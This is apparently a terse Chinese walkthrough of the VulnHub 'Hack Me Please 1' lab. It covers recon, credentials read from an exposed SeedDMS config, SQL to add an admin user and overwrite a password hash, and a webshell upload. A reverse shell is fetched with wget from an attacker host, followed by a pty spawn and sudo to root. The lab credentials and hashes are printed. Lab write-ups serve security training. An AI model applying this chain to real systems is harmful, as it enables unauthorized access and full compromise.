URL : https://www.vulnhub.com/entry/hack-me-please-1,731/

IP : 192.168.1.111

Recon

  • 掃 Portrustscan -a 192.168.1.111nmap -A -p80,3306,33060 192.168.1.111- 掃 Dir- python3 dirsearch.py -u http://192.168.1.111/
  • 看不出啥特別ㄉ觀察首頁- 觀察 main.js-
  • 發現註解寫了一個 /seeddms51x/seeddms-5.1.22 的路徑

DMS

  • 掃路徑發現有 install 等資訊觀察原始碼-
  • 到 SorceForge 下載原始碼觀察路徑-
  • 發現路徑內有 /conf/ 可能有重要的資訊/conf/settings.xml 可以存取- 裡面找到 mysql 的帳密 seeddms

MySQL

  • 進行 MySQL 連線觀察 DB- 觀察表格- users-
  • 找到一組帳密saket
  • saurav
  • Saket@#$1337但登入 DMS 失敗找到 tblUsers-
  • 分析 hash
  • 應該是 md5哈希貓爆破-
  • 爆不出來QQ自己創一個使用者 mysql INSERT INTO tblUsers (id,login,pwd,fullName,email,role,language,theme,comment) VALUES (3,"meow","4a4be40c96ac6314e91d93f38043a634","Meow","meow@meow.meow",1,"en_US",0,0);-
  • 可以登入,但畫面是白的 QQ改使用者密碼- 原本是 f9ef2c539bad8a6d2f3432b6d49ab51a先存著備用,怕以後要用到update tblUsers set pwd='4a4be40c96ac6314e91d93f38043a634' where id=1;-
  • 就登入成功ㄌ上傳 webshell因為 seeddms51x 目錄沒有鎖權限- 根據觀察,檔案會存在 http://192.168.1.111/seeddms51x/data/1048576/{檔案ID}/1.{檔案附檔名}載 Reverse shell- http://192.168.1.111/seeddms51x/data/1048576/4/1.php?A=wget%20192.168.1.109:8000/s_l接上 Reverse shell- 使用交互式python3 -c 'import pty; pty.spawn("/bin/bash")'切換使用者-
  • 使用當初 DB 看到的密碼提權- sudo -l 發現可以直接成為 root